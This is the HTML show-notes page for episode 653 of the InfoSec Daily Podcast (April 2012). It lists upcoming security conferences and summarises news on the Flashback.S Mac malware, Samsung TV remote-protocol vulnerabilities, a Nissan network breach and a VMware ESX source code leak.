		<description><![CDATA[InfoSec Daily Podcast Episode 653 for April 25, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Karthik Rangarajan. &#160; Announcements Linuxfest Northwest 2012 When: April 28-29, 2012 Where: Bellingham Technical College &#8211; Bellingham, WA http://www.linuxfestnorthwest.org/ &#160; AIDE 2012 When: May 21-25, 2012 Where: MU Forensic Science Center &#160;- Huntington, West Virginia http://www.appyide.org/ [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 653 for April 25, 2012. </span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Karthik Rangarajan.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Announcements</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 28-29, 2012<br class="kix-line-break" /><br />
	Where: Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /><br />
	</span><a href="http://www.linuxfestnorthwest.org/"><span style="font-size:16px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:16px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></p>
<p><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> <br class="kix-line-break" /><br />
	</span><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD<br class="kix-line-break" /><br />
	</span><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:16px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:16px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skydogcon</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	When: October 26-28<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com/"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Please consider making your &nbsp;Amazon purchases through our affiliate link. &nbsp;If you&rsquo;re not familiar with the affiliate link it is locate the Affiliate Program link on the right hand side.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">or simply use our QR Code Links.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Amazon:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><img height="135px;" src="https://lh5.googleusercontent.com/LAYkwhGFiVw-ptpuSPp4WjIdtW_ghcXudMabohBz4r3iCthQyFXpyxD7ul_GbqAm_3l0743CIZoZPqrVVeCNQnyb15x11pXnAtnMBgeEssKcNYXlt6I" width="135px;" /></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Amazon UK:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><img height="138px;" src="https://lh6.googleusercontent.com/3gmQD92mKOmM8KcG_U9IcBy91vBZW1FKhE8bmEiT90Viue1mZPdujMIO2OKlGmYy9vu4rYC11b0uHIv3sS8G6O5m798rSOLBeGAI7q8PbQQ-BBS4bO8" width="138px;" /></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.computerworld.com/s/article/9226521/New_sneakier_Flashback_malware_infects_Macs"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.computerworld.com/s/article/9226521/New_sneakier_Flashback_malware_infects_Macs</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A new, sneakier variant of the Flashback malware was uncovered yesterday by the French security firm Intego.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Flashback.S, which</span><a href="http://www.intego.com/mac-security-blog/new-flashback-variant-continues-java-attack-installs-without-password/"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> Intego described Monday</span></a><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, uses the same Java vulnerability as an earlier version that has infected an estimated 820,000 Macs since its appearance and still plagues over 600,000 machines.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But unlike Flashback.K, the variant that first surfaced last month and has caused consternation among Mac users, Flashback.S never asks the victim to enter an administrative password for installation, but instead relies only on the silent exploit of the Java bug to sneak onto the system.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The differences are very subtle,&quot; Peter James, a spokesman for Intego, said in an interview Tuesday. &quot;There&#39;s no password request [by Flashback.S].&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Flashback.K used different infection tactics: Even though it exploited the same Java vulnerability &#8212; identified as CVE-2012-0507 &#8212; it also displayed the standard OS X password-request dialog. If users entered their password, the malware installed itself in a different location, where it was even harder to detect.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://threatpost.com/en_us/blogs/researcher-causes-endless-restart-loop-samsung-tvs-042412"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/researcher-causes-endless-restart-loop-samsung-tvs-042412</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Italian security researcher Luigi Auriemma was trying to play a trick on his brother when he accidentally discovered two vulnerabilities in all current versions of Samsung TVs and Blu-Ray systems that could allow an attacker to gain remote access to those devices.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://aluigi.org/adv/samsux_1-adv.txt"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Auriemma claims</span></a><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> that the vulnerabilities will affect all Samsung devices with support for remote controllers, and that the vulnerable protocol is on both TVs and Blu-Ray enabled devices.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">One of the bugs leads to a loop of endless restarts while the other could cause a potential buffer overflow.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Auriemma discovered the issues accidentally. He told Threatpost via email that he was trying to play a trick on his brother. He only wanted to send a remote controller request with a funny message, but he ended up nearly destroying the TV.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">To exploit Auriemma&rsquo;s vulnerabilities requires only that the devices are connected to a wi-fi network.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As background, Auriemma explains that when the device receives a controller packet it displays message informing users that a new &lsquo;remote&rsquo; has been detected, and prompts the user to &lsquo;allow&rsquo; or &lsquo;deny&rsquo; access. Included with this remote packet is a string field used for the name of device. Auriemma found that if he altered the name string to contain line feed and other invalid characters, the device would enter an endless loop.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Auriemma claims that nothing really happens for the first five seconds, but then he lost control of the TV, both manually on the control panel and with the remote. Then after another five seconds, he claims, the TV automaticall restarts. Then the process repeats itself forever, even after unplugging the TV. Eventually, Auriemma managed to reset the TV in service mode. He writes that users can avoid the situation altogether by hitting &lsquo;exit&rsquo; when prompted to &lsquo;allow&rsquo; or &lsquo;deny&rsquo; the new remote device.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://bits.blogs.nytimes.com/2012/04/24/nissan-is-latest-company-to-get-hacked/"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://bits.blogs.nytimes.com/2012/04/24/nissan-is-latest-company-to-get-hacked/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Nissan confirmed its computer systems were hacked two weeks ago. &nbsp;The Japanese automaker said that hackers broke into its network and stole employees&rsquo; usernames and encrypted passwords. The company said it first noticed an abnormality on its network Friday, April 13, when it discovered a piece of malicious malware had targeted employees&rsquo; log-in credentials and was transmitting them back to an outside computer server. Nissan did not say which employees had been targeted, what division they worked in or what the intruders may have been after. The company tracked the intrusions back to an Internet protocol address, but said it did not give much indication of who was behind the attack.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;We do know the I.P. addresses but it really does not tell you a whole lot,&rdquo; said David Reuter, a Nissan spokesman. &ldquo;Hackers can bounce things off servers all over the world, so the entry I.P. address is not necessarily where the hack originates. The trail goes cold pretty quickly.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Nissan said it waited a week to disclose the attack to customers and employees while it closed open holes in its network and cleaned up its systems with the help of outside security consultants. On Friday, Andy Palmer, a Nissan executive vice president,</span><a href="http://nissannews.com/en-US/nissan/usa/releases/statement-nissan-is-taking-actions-to-protect-and-inform-employees-and-customers-following-an-intrusion-into-the-company-s-global-network-systems"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> disclosed the attack in a statement</span></a><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and said there was no indication any customer, employee or intellectual property data had been stolen.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://threatpost.com/en_us/blogs/e-mail-source-code-vmware-bubble-compromised-chinese-firm-042412"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/e-mail-source-code-vmware-bubble-compromised-chinese-firm-042412</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://blogs.vmware.com/security/2012/04/vmware-security-note.html"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blogs.vmware.com/security/2012/04/vmware-security-note.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.crn.com/news/security/232900903/anonymous-hacker-claims-credit-for-vmware-esx-code-leak.htm"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.crn.com/news/security/232900903/anonymous-hacker-claims-credit-for-vmware-esx-code-leak.htm</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">April 23, 2012, our security team became aware of the public posting of a single file from the VMware ESX source code and the possibility that more files may be posted in the future. The posted code and associated commentary dates to the 2003 to 2004 timeframe.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">The fact that the source code may have been publicly shared does not necessarily mean that there is any increased risk to VMware customers. VMware proactively shares its source code and interfaces with other industry participants to enable the broad virtualization ecosystem today. We take customer security seriously and have engaged internal and external resources, including our VMware Security Response Center, to thoroughly investigate. We will continue to provide updates to the VMware community if and when additional information is available</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">VMware&#39;s ESX hypervisor source code leak may stem from an attack on a Chinese import-export firm last month in which an anonymous hacker claims to have made off with more than one terabyte of confidential documents.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On Tuesday, Kaspersky Lab&#39;s Threatpost blog reported the details of its recent IRC conversation with &quot;Hardcore Charlie,&quot; the anonymous hacker who posted</span><a href="http://pastebin.com/JGxdK6vw"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> the purported VMware ESX source code online</span></a><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> on April 8.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hardcore Charlie claims to have obtained the VMware ESX source code after breaching the corporate network of the China National Electronics Import-Export Corporation (CEIEC), a Beijing-based firm. He also broke into and stole documents from the networks of China North Industries Corporation (Norinco) WanBao Mining Ltd, Ivanho and PetroVietnam, according to the Threatpost report.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">VMware could not be reached for comment.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a security bulletin issued earlier on Tuesday, VMware warned that a single file from its ESX server hypervisor source code had been posted online and said it is possible that more proprietary files could be leaked.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The leaked ESX code is from the 2003 to 2004 period, and security experts told CRN the potential impact of the breach depends on how much VMware has changed the code base since then.</span></p>
